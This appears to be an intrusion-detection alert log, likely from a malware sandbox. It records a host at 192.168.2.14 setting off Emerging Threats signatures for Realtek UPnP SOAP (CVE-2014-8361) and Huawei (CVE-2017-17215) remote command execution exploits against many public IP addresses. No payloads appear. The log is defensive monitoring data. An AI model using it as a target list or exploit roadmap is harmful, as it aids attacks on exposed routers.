                                                07/20/24-23:05:44.364083TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3676852869192.168.2.1450.231.248.171
                                                07/20/24-23:05:35.507047TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5401052869192.168.2.1434.90.248.232
                                                07/20/24-23:06:08.565771TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4099252869192.168.2.14122.247.158.220
                                                07/20/24-23:05:38.622531TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615650452869192.168.2.145.238.81.248
                                                07/20/24-23:05:42.143657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5649237215192.168.2.1441.217.72.248
                                                07/20/24-23:05:57.159681TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613472052869192.168.2.14209.194.5.31
                                                07/20/24-23:05:45.412130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6003037215192.168.2.1441.161.23.86
                                                07/20/24-23:06:01.185323TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24884252869192.168.2.1450.186.160.203
                                                07/20/24-23:05:56.127169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4709637215192.168.2.1441.102.87.173
                                                07/20/24-23:06:09.675613TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4333452869192.168.2.14193.194.227.213
                                                07/20/24-23:05:59.972369TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4343852869192.168.2.1419.25.67.71
                                                07/20/24-23:06:02.071790TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6062252869192.168.2.1427.46.145.139
                                                07/20/24-23:05:37.520621TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23514452869192.168.2.1479.15.211.18
                                                07/20/24-23:06:31.147829TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4832652869192.168.2.1435.230.101.186
                                                07/20/24-23:06:01.888773TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5865652869192.168.2.14126.18.149.137
                                                07/20/24-23:07:07.493314TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26051252869192.168.2.14216.158.254.36
                                                07/20/24-23:07:07.817264TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4219652869192.168.2.1466.55.188.148
                                                07/20/24-23:06:09.668423TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3558852869192.168.2.1453.149.94.192
                                                07/20/24-23:05:38.950380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4718837215192.168.2.1441.158.13.136
                                                07/20/24-23:05:48.035512TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614115852869192.168.2.14137.223.238.217
                                                07/20/24-23:05:57.149453TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615056052869192.168.2.14222.129.233.119
                                                07/20/24-23:06:20.736535TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3560452869192.168.2.14154.27.63.24
                                                07/20/24-23:05:39.054227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4535237215192.168.2.14101.201.248.249
                                                07/20/24-23:06:00.607400TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23300052869192.168.2.14102.108.27.28
                                                07/20/24-23:06:17.661736TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614622852869192.168.2.1493.1.194.191
                                                07/20/24-23:05:34.662485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3414637215192.168.2.1441.124.231.107
                                                07/20/24-23:05:52.572723TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24695052869192.168.2.14156.215.77.129
                                                07/20/24-23:05:57.029235TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24995452869192.168.2.1459.6.13.116
                                                07/20/24-23:05:39.566903TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615173452869192.168.2.1471.187.255.160
                                                07/20/24-23:05:40.439699TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25336652869192.168.2.14131.183.255.118
                                                07/20/24-23:05:44.273031TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614269252869192.168.2.1499.215.247.10
                                                07/20/24-23:05:37.476343TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3636852869192.168.2.1439.204.207.21
                                                07/20/24-23:05:39.054227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3694237215192.168.2.14197.30.233.251
                                                07/20/24-23:05:57.546626TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5071652869192.168.2.1469.166.16.198
                                                07/20/24-23:05:59.333647TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4191852869192.168.2.14189.34.115.204
                                                07/20/24-23:05:36.577316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5544837215192.168.2.1441.12.50.91
                                                07/20/24-23:05:52.460913TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4264052869192.168.2.1460.123.7.240
                                                07/20/24-23:05:56.421312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4108037215192.168.2.1499.172.26.232
                                                07/20/24-23:06:02.447932TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5974052869192.168.2.1457.97.23.2
                                                07/20/24-23:06:00.006350TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24906452869192.168.2.14103.96.99.69
                                                07/20/24-23:05:45.439167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4488637215192.168.2.1494.111.19.141
                                                07/20/24-23:05:48.808887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4782837215192.168.2.1441.162.171.182
                                                07/20/24-23:05:59.692242TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5015852869192.168.2.14174.254.246.247
                                                07/20/24-23:05:40.462607TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26073652869192.168.2.1424.160.46.49
                                                07/20/24-23:05:37.611139TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3819052869192.168.2.14211.88.161.89
                                                07/20/24-23:05:38.820643TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613547452869192.168.2.14193.96.47.59
                                                07/20/24-23:06:02.368020TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4563852869192.168.2.1440.244.169.7
                                                07/20/24-23:05:42.127943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3678837215192.168.2.14157.156.135.191
                                                07/20/24-23:06:16.332122TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4795852869192.168.2.14164.153.241.195
                                                07/20/24-23:05:42.245742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5349237215192.168.2.1441.55.101.144
                                                07/20/24-23:06:11.279918TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3680252869192.168.2.14114.47.146.27
                                                07/20/24-23:05:59.333908TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615800852869192.168.2.1489.31.185.148
                                                07/20/24-23:05:52.485640TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23447252869192.168.2.1472.109.105.60
                                                07/20/24-23:05:38.545017TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614023052869192.168.2.1451.130.138.196
                                                07/20/24-23:05:39.282126TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4373252869192.168.2.1427.50.141.50
                                                07/20/24-23:05:50.522256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5044637215192.168.2.1441.141.36.160
                                                07/20/24-23:05:37.449834TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4408052869192.168.2.14145.82.197.86
                                                07/20/24-23:06:01.121675TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23335852869192.168.2.14114.138.107.32
                                                07/20/24-23:05:35.767909TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615387052869192.168.2.1431.182.192.107
                                                07/20/24-23:05:40.468265TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25904852869192.168.2.1464.79.183.126
                                                07/20/24-23:05:37.464931TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25216252869192.168.2.14131.84.155.33
                                                07/20/24-23:05:35.223853TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3806852869192.168.2.14190.231.104.96
                                                07/20/24-23:06:02.167111TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5353052869192.168.2.1488.174.31.158
                                                07/20/24-23:05:56.403310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4039237215192.168.2.14197.180.175.57
                                                07/20/24-23:06:33.055161TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615614852869192.168.2.14185.178.75.65
                                                07/20/24-23:05:33.859779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5378237215192.168.2.14157.176.218.10
                                                07/20/24-23:05:33.860838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5355037215192.168.2.14157.198.219.2
                                                07/20/24-23:06:16.285196TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5466252869192.168.2.14216.94.128.112
                                                07/20/24-23:06:08.154674TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5126452869192.168.2.14197.174.120.97
                                                07/20/24-23:06:01.860812TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5169652869192.168.2.14150.158.253.160
                                                07/20/24-23:05:37.457748TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5532852869192.168.2.14115.97.137.57
                                                07/20/24-23:06:00.208694TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3451052869192.168.2.141.109.211.216
                                                07/20/24-23:06:13.525153TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5473252869192.168.2.14205.249.112.164
                                                07/20/24-23:05:37.489725TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24720852869192.168.2.1447.85.1.133
                                                07/20/24-23:05:59.339081TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3614852869192.168.2.14101.195.118.86
                                                07/20/24-23:05:47.105578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5746237215192.168.2.14197.212.70.117
                                                07/20/24-23:05:57.224112TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5984052869192.168.2.1450.236.40.162
                                                07/20/24-23:05:42.221844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5131037215192.168.2.14186.188.62.231
                                                07/20/24-23:05:57.568828TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613914652869192.168.2.1424.224.16.219
                                                07/20/24-23:06:18.694959TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24684852869192.168.2.1452.159.47.88
                                                07/20/24-23:05:48.788274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5777637215192.168.2.1441.143.125.179
                                                07/20/24-23:06:14.614129TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25512452869192.168.2.14129.99.98.243
                                                07/20/24-23:06:15.234952TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5443052869192.168.2.14216.94.128.112
                                                07/20/24-23:05:57.556241TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616080852869192.168.2.141.65.215.231
                                                07/20/24-23:05:45.988990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5138237215192.168.2.1441.235.201.216
                                                07/20/24-23:05:57.939285TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614174852869192.168.2.1447.119.95.118
                                                07/20/24-23:05:48.059855TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614363852869192.168.2.14161.199.46.212
                                                07/20/24-23:05:39.324403TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615010852869192.168.2.14142.238.12.119
                                                07/20/24-23:06:01.954738TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4263452869192.168.2.14192.59.185.246
                                                07/20/24-23:05:33.835674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4700237215192.168.2.14197.178.185.152
                                                07/20/24-23:06:05.219605TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4229852869192.168.2.1498.99.33.62
                                                07/20/24-23:06:06.191841TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5997452869192.168.2.1485.226.212.53
                                                07/20/24-23:05:52.508651TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24258652869192.168.2.1448.186.210.104
                                                07/20/24-23:05:59.471230TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615395652869192.168.2.14203.215.159.116
                                                07/20/24-23:06:19.817334TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3952052869192.168.2.14167.72.136.166
                                                07/20/24-23:05:59.574335TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615147052869192.168.2.14126.33.182.99
                                                07/20/24-23:05:36.361899TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3640652869192.168.2.14172.51.35.214
                                                07/20/24-23:05:38.127633TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3292852869192.168.2.14176.44.128.80
                                                07/20/24-23:05:38.482733TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4890052869192.168.2.14206.167.163.90
                                                07/20/24-23:05:48.767395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4574037215192.168.2.14189.91.251.59
                                                07/20/24-23:06:12.509551TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3409852869192.168.2.14160.153.18.205
                                                07/20/24-23:06:23.035057TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4145452869192.168.2.1440.170.192.203
                                                07/20/24-23:05:37.443569TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24206452869192.168.2.1495.188.72.113
                                                07/20/24-23:06:15.480465TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615122452869192.168.2.1412.242.114.145
                                                07/20/24-23:05:59.204856TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25410652869192.168.2.1474.72.162.6
                                                07/20/24-23:05:57.974933TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613653052869192.168.2.14100.47.215.113
                                                07/20/24-23:06:21.790299TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614722452869192.168.2.1483.126.117.245
                                                07/20/24-23:05:40.355569TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5667452869192.168.2.1478.158.185.24
                                                07/20/24-23:05:40.471609TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3728452869192.168.2.14121.139.236.213
                                                07/20/24-23:06:14.460726TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5600852869192.168.2.14211.197.197.167
                                                07/20/24-23:05:57.122986TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5417052869192.168.2.14186.140.123.10
                                                07/20/24-23:05:45.376608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5654237215192.168.2.14157.181.75.164
                                                07/20/24-23:05:45.988990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5751637215192.168.2.1441.17.231.76
                                                07/20/24-23:07:25.723282TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23654652869192.168.2.1471.185.114.186
                                                07/20/24-23:06:41.431490TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613434852869192.168.2.14180.193.127.65
                                                07/20/24-23:06:25.634766TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613714852869192.168.2.1489.152.172.93
                                                07/20/24-23:06:37.871435TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3631452869192.168.2.1492.17.141.87
                                                07/20/24-23:05:59.192985TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23967852869192.168.2.14211.66.122.221
                                                07/20/24-23:05:45.437584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5158637215192.168.2.1441.43.228.105
                                                07/20/24-23:06:01.250185TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4770652869192.168.2.1417.60.150.214
                                                07/20/24-23:05:50.559359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4685637215192.168.2.14157.6.198.50
                                                07/20/24-23:06:00.483549TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3560852869192.168.2.1489.202.192.181
                                                07/20/24-23:05:36.324397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5099837215192.168.2.14157.116.93.101
                                                07/20/24-23:05:57.587244TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4884452869192.168.2.1458.234.91.201
                                                07/20/24-23:05:57.934535TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616016252869192.168.2.14190.92.119.202
                                                07/20/24-23:06:03.171950TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3824252869192.168.2.1495.214.15.233
                                                07/20/24-23:06:18.369794TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24935652869192.168.2.1414.90.177.172
                                                07/20/24-23:05:57.791970TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24809052869192.168.2.1498.41.122.243
                                                07/20/24-23:05:37.447263TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26096452869192.168.2.14223.12.218.46
                                                07/20/24-23:06:00.971446TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615789252869192.168.2.1495.117.101.32
                                                07/20/24-23:06:29.771660TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4733852869192.168.2.1483.126.117.245
                                                07/20/24-23:05:57.678099TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4322252869192.168.2.14173.94.91.109
                                                07/20/24-23:06:19.756250TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615950452869192.168.2.1442.26.193.251
                                                07/20/24-23:05:35.316603TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5136252869192.168.2.1490.248.254.246
                                                07/20/24-23:06:01.613195TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3673452869192.168.2.1468.182.243.39
                                                07/20/24-23:07:06.736138TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3658452869192.168.2.149.213.251.239
                                                07/20/24-23:06:33.320646TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613482252869192.168.2.14155.48.187.37
                                                07/20/24-23:05:45.447173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4414637215192.168.2.14157.234.69.192
                                                07/20/24-23:05:47.561552TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5950452869192.168.2.14151.208.74.251
                                                07/20/24-23:05:33.833027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4116637215192.168.2.14197.163.62.174
                                                07/20/24-23:06:43.392497TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4702452869192.168.2.1495.121.126.32
                                                07/20/24-23:06:02.663981TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613620652869192.168.2.14111.159.251.81
                                                07/20/24-23:06:13.733520TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4794452869192.168.2.1478.193.254.243
                                                07/20/24-23:05:44.320091TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4672452869192.168.2.1499.151.162.57
                                                07/20/24-23:05:56.993302TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613931052869192.168.2.14130.98.61.37
                                                07/20/24-23:06:35.070304TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4816052869192.168.2.14125.212.164.174
                                                07/20/24-23:05:48.858199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5188237215192.168.2.14197.97.65.149
                                                07/20/24-23:05:45.429987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5441437215192.168.2.14157.32.49.177
                                                07/20/24-23:05:59.674473TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23966452869192.168.2.1424.224.16.219
                                                07/20/24-23:05:37.447452TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4637252869192.168.2.1462.135.228.95
                                                07/20/24-23:06:29.433951TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615038252869192.168.2.14160.32.94.148
                                                07/20/24-23:05:35.204234TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615335852869192.168.2.1474.170.109.218
                                                07/20/24-23:05:38.803802TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615873452869192.168.2.14218.43.11.190
                                                07/20/24-23:05:57.960840TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615855452869192.168.2.1496.122.149.45
                                                07/20/24-23:07:28.049580TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614952652869192.168.2.1431.80.56.65
                                                07/20/24-23:05:59.805275TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4291052869192.168.2.1488.73.51.55
                                                07/20/24-23:05:42.176965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3552637215192.168.2.14124.123.46.136
                                                07/20/24-23:05:40.465472TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5420452869192.168.2.14154.76.182.106
                                                07/20/24-23:06:11.251823TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5400652869192.168.2.1448.215.144.137
                                                07/20/24-23:06:17.645982TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4617052869192.168.2.14105.234.90.169
                                                07/20/24-23:05:48.756259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5781637215192.168.2.14197.105.120.116
                                                07/20/24-23:06:27.950361TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613513052869192.168.2.14142.198.37.15
                                                07/20/24-23:05:40.444875TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23933452869192.168.2.1487.25.55.60
                                                07/20/24-23:05:38.391843TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615087252869192.168.2.1475.119.92.151
                                                07/20/24-23:05:39.625456TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616058252869192.168.2.1497.6.189.98
                                                07/20/24-23:05:52.544972TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5058052869192.168.2.1462.154.246.173
                                                07/20/24-23:05:52.589392TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5213452869192.168.2.1449.62.131.203
                                                07/20/24-23:05:45.265292TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4723852869192.168.2.14161.61.246.176
                                                07/20/24-23:05:52.442221TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4366452869192.168.2.1466.110.133.249
                                                07/20/24-23:05:58.922584TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24333852869192.168.2.1458.185.111.115
                                                07/20/24-23:05:37.475548TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25560452869192.168.2.14113.211.98.23
                                                07/20/24-23:06:34.302136TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24662652869192.168.2.14112.166.149.158
                                                07/20/24-23:05:48.223799TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5236052869192.168.2.14115.216.218.252
                                                07/20/24-23:06:11.880262TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5956452869192.168.2.14132.226.208.26
                                                07/20/24-23:05:36.584864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3575437215192.168.2.1441.138.65.24
                                                07/20/24-23:05:38.971654TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5763837215192.168.2.1441.102.68.163
